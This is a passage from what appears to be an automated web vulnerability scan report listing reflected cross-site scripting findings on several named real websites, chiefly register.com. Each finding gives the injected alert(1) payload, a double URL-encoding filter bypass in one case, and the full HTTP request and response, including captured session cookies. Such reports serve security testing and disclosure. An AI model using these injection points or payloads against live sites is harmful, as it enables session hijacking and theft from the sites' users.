Referer: http://frankgruber.me/post/9680693152/the-view-looking-out-from-techcocktail-boston-at
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 03 Sep 2011 13:17:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7318
Content-Type: application/x-javascript
Expires: Sat, 03 Sep 2011 13:27:13 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
.addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s29fjgruberd44ca';alert(1)//d4128f40f21', 's29.sitemeter.com', '');

var g_sLastCodeName = 's29fjgruberd44ca';alert(1)//d4128f40f21';
// ]]>
...[SNIP]...

4.8. http://s29.sitemeter.com/js/counter.js [site parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s29.sitemeter.com
Path:	/js/counter.js

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 880a1'%3balert(1)//032b9cc3e90 was submitted in the site parameter. This input was echoed as 880a1';alert(1)//032b9cc3e90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /js/counter.js?site=s29fjgruber880a1'%3balert(1)//032b9cc3e90 HTTP/1.1
Host: s29.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://frankgruber.me/post/9680693152/the-view-looking-out-from-techcocktail-boston-at
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sat, 03 Sep 2011 13:17:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7318
Content-Type: application/x-javascript
Expires: Sat, 03 Sep 2011 13:27:13 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
.addEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s29fjgruber880a1';alert(1)//032b9cc3e90', 's29.sitemeter.com', '');

var g_sLastCodeName = 's29fjgruber880a1';alert(1)//032b9cc3e90';
// ]]>
...[SNIP]...

4.9. http://www.godaddy.com/external/json/PcSetData.aspx [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.godaddy.com
Path:	/external/json/PcSetData.aspx

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c5f83<script>alert(1)</script>ad6c14f1643 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /external/json/PcSetData.aspx?ci=17368&callback=pcj_setdatac5f83<script>alert(1)</script>ad6c14f1643&pcj_setdata=jsonp1315085571645&_=1315085571848 HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/gdshop/offers/cross_sell.asp?ci=42031&config=ssldefault
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hjhwaz45up3pxz55cnrxsi55; ASPSESSIONIDACSTCQTS=OBJPAOKANJKKAGECLEBMBEIM; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; BlueLithium_ssl=dbdflblbdeidccshddredcccjfvazaii; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; adc1=US; currency1=potableSourceStr=USD; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; domainYardVal=%2D1; serverVersion=A; traffic=referringdomain=&referringpath=8d587be0%2D834e%2D4a03%2D83dc%2D2f3bcb783a40&shopper=46215684&querystring=ci%3D42031%26config%3Dssldefault&server=M1PWCORPWEB109&isc=&privatelabelid=1&page=%2Fgdshop%2Foffers%2Fcross%5Fsell%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=50%2E23%2E123%2E106&status=200+OK&referrer=http%3A%2F%2Fwww%2Egodaddy%2Ecom%2Fssl%2Fssl%2Dcertificates%2Easpx%3Fci%3D8346&cookies=1; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMinorVer=3&fMajorVer=10&slMajorVer=-1&slMinorVer=-1

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=0
Content-Type: text/javascript; charset=utf-8
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 03 Sep 2011 21:47:19 GMT
Content-Length: 71

pcj_setdatac5f83<script>alert(1)</script>ad6c14f1643({"Error":"Error"})

4.10. http://www.meetup.com/api/ [method parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.meetup.com
Path:	/api/

Issue detail

The value of the method request parameter is copied into the HTML document as plain text between tags. The payload 94cc7<img%20src%3da%20onerror%3dalert(1)>74359147cc3 was submitted in the method parameter. This input was echoed as 94cc7<img src=a onerror=alert(1)>74359147cc3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /api/?method=getAlertTopicStats94cc7<img%20src%3da%20onerror%3dalert(1)>74359147cc3&arg_topicId=381&arg_lat=42.37&arg_lon=-71.09&arg_radius=50&arg_zip=02142&arg_country=us&arg_language=en_US HTTP/1.1
Host: www.meetup.com
Proxy-Connection: keep-alive
Referer: http://www.meetup.com/Boston-BizSpark-Meetup/events/30620321/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MEETUP_MEMBER=id=0&status=1&timestamp=1315055493&bs=0&tz=US%2FEastern&zip=&country=us&city=&state=&lat=0.0&lon=0.0&domain=&dc=&s=88f912a4b3d9f96f4f99f1d5b0e82fe99809932d; MEETUP_AFFIL=affil=meetup&ref=microsoftcambridge.com/events/bostonbizsparkmeetupseptember2011/tabid/879; MEETUP_LANGUAGE=language=en&country=US; MEETUP_GA=id%3D0%26segment%3Dalien; __utma=19434532.1405489551.1315055535.1315055535.1315055535.1; __utmb=19434532.4.10.1315055535; __utmc=19434532; __utmz=19434532.1315055535.1.1.utmcsr=microsoftcambridge.com|utmccn=(referral)|utmcmd=referral|utmcct=/Events/BostonBizSparkMeetupSeptember2011/tabid/879/Default.aspx; __utmv=19434532.id%3D0%26segment%3Dalien

Response

HTTP/1.1 403 Forbidden
Date: Sat, 03 Sep 2011 13:11:49 GMT
Server: Apache-Coyote/1.1
Expires: 0
X-Meetup-server: app16.int.meetup.com
Content-Type: application/json;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 112
Connection: close

{"UNKNOWN":"[BAD METHOD] Can't find method \"getAlertTopicStats94cc7<img src=a onerror=alert(1)>74359147cc3\"."}

4.11. http://www.microcad.ca/cart/add/ [productid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.microcad.ca
Path:	/cart/add/

Issue detail

The value of the productid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 36039%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6607268138f was submitted in the productid parameter. This input was echoed as 36039'><script>alert(1)</script>6607268138f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the productid request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 18701
Content-Type: text/html
ACCEPT-RANGES: none

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Microcad.ca | Sho
...[SNIP]...
<a href='/cart/remove/101195676036039'><script>alert(1)</script>6607268138f'>
...[SNIP]...

4.12. http://www.register.com/css/home-optimized.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.register.com
Path:	/css/home-optimized.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59ae9"%3balert(1)//903e1a040cb was submitted in the REST URL parameter 1. This input was echoed as 59ae9";alert(1)//903e1a040cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /css59ae9"%3balert(1)//903e1a040cb/home-optimized.css;jsessionid=7F95BBDBD32D1299F06089A606E23A3A.janus-production HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2011 21:34:56 GMT
HostName: atleuapp01.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 22792
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...
<script type="text/javascript">
aopinfo={showOnAbandon:false,popUrl:"/aop-pop.rcmx?opener=/css59ae9";alert(1)//903e1a040cb/home-optimized.css",width:400,height:400 }
</script>
...[SNIP]...

4.13. http://www.register.com/domain/searchresults.rcmx [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.register.com
Path:	/domain/searchresults.rcmx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e87eb"%3balert(1)//6208eb93c15 was submitted in the REST URL parameter 1. This input was echoed as e87eb";alert(1)//6208eb93c15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /domaine87eb"%3balert(1)//6208eb93c15/searchresults.rcmx?webmetrics=null&searchOrigin=homepage&domain=xss&selectedTLDs=.com&x=0&y=0 HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; mbox=check#true#1315085461|session#1315085400638-452340#1315087261|PC#1315085400638-452340.19#1317677403; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=195431987.824255109.1315085416.1315085416.1315085416.1; __utmb=195431987.1.10.1315085416; __utmc=195431987; __utmz=195431987.1315085416.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|27314E20051D1798-6000010600062C35[CE]

Response

HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2011 22:14:06 GMT
HostName: atleuapp04.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 22798
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...
<script type="text/javascript">
aopinfo={showOnAbandon:false,popUrl:"/aop-pop.rcmx?opener=/domaine87eb";alert(1)//6208eb93c15/searchresults.rcmx",width:400,height:400 }
</script>
...[SNIP]...

4.14. http://www.register.com/domain/searchresults.rcmx [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.register.com
Path:	/domain/searchresults.rcmx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c08de"%3balert(1)//874342fb6c6 was submitted in the REST URL parameter 2. This input was echoed as c08de";alert(1)//874342fb6c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /domain/searchresults.rcmxc08de"%3balert(1)//874342fb6c6?webmetrics=null&searchOrigin=homepage&domain=xss&selectedTLDs=.com&x=0&y=0 HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; mbox=check#true#1315085461|session#1315085400638-452340#1315087261|PC#1315085400638-452340.19#1317677403; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=195431987.824255109.1315085416.1315085416.1315085416.1; __utmb=195431987.1.10.1315085416; __utmc=195431987; __utmz=195431987.1315085416.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|27314E20051D1798-6000010600062C35[CE]

Response

HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2011 22:14:19 GMT
HostName: atleuapp04.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 22798
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...
<script type="text/javascript">
aopinfo={showOnAbandon:false,popUrl:"/aop-pop.rcmx?opener=/domain/searchresults.rcmxc08de";alert(1)//874342fb6c6",width:400,height:400 }
</script>
...[SNIP]...

4.15. http://www.register.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.register.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8565"%3balert(1)//1bdb2705792 was submitted in the REST URL parameter 1. This input was echoed as d8565";alert(1)//1bdb2705792 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /favicon.icod8565"%3balert(1)//1bdb2705792 HTTP/1.1
Accept: */*
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/)
Host: www.register.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2011 21:36:48 GMT
HostName: atleuapp02.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 22770
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...
<script type="text/javascript">
aopinfo={showOnAbandon:false,popUrl:"/aop-pop.rcmx?opener=/favicon.icod8565";alert(1)//1bdb2705792",width:400,height:400 }
</script>
...[SNIP]...

4.16. http://www.register.com/font/vag-bold.ttf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.register.com
Path:	/font/vag-bold.ttf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41cfd"%3balert(1)//a7bdf3e7ba5 was submitted in the REST URL parameter 1. This input was echoed as 41cfd";alert(1)//a7bdf3e7ba5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /font41cfd"%3balert(1)//a7bdf3e7ba5/vag-bold.ttf HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; mbox=check#true#1315085461|session#1315085400638-452340#1315087261|PC#1315085400638-452340.19#1317677403

Response

HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2011 21:33:09 GMT
HostName: atleuapp02.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 22782
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...
<script type="text/javascript">
aopinfo={showOnAbandon:false,popUrl:"/aop-pop.rcmx?opener=/font41cfd";alert(1)//a7bdf3e7ba5/vag-bold.ttf",width:400,height:400 }
</script>
...[SNIP]...

4.17. http://www.register.com/font/vag-bold.woff [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.register.com
Path:	/font/vag-bold.woff

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0d15"%3balert(1)//be090e0bf41 was submitted in the REST URL parameter 1. This input was echoed as e0d15";alert(1)//be090e0bf41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /fonte0d15"%3balert(1)//be090e0bf41/vag-bold.woff HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; mbox=check#true#1315085461|session#1315085400638-452340#1315087261|PC#1315085400638-452340.19#1317677403

Response

HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2011 21:34:38 GMT
HostName: atleuapp01.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 22784
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...
<script type="text/javascript">
aopinfo={showOnAbandon:false,popUrl:"/aop-pop.rcmx?opener=/fonte0d15";alert(1)//be090e0bf41/vag-bold.woff",width:400,height:400 }
</script>
...[SNIP]...

4.18. http://www.register.com/images/sn/hp.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.register.com
Path:	/images/sn/hp.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 593a2"%3balert(1)//40444370589 was submitted in the REST URL parameter 1. This input was echoed as 593a2";alert(1)//40444370589 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images593a2"%3balert(1)//40444370589/sn/hp.xml HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; mbox=check#true#1315085461|session#1315085400638-452340#1315087261|PC#1315085400638-452340.19#1317677403; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=195431987.824255109.1315085416.1315085416.1315085416.1; __utmb=195431987.1.10.1315085416; __utmc=195431987; __utmz=195431987.1315085416.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|27314E20051D1798-6000010600062C35[CE]

Response

HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2011 21:37:36 GMT
HostName: atleuapp02.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 22780
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...
<script type="text/javascript">
aopinfo={showOnAbandon:false,popUrl:"/aop-pop.rcmx?opener=/images593a2";alert(1)//40444370589/sn/hp.xml",width:400,height:400 }
</script>
...[SNIP]...

4.19. http://www.register.com/js/aop-attach.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.register.com
Path:	/js/aop-attach.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7da06"%3balert(1)//439baa57256 was submitted in the REST URL parameter 1. This input was echoed as 7da06";alert(1)//439baa57256 in the application's response.

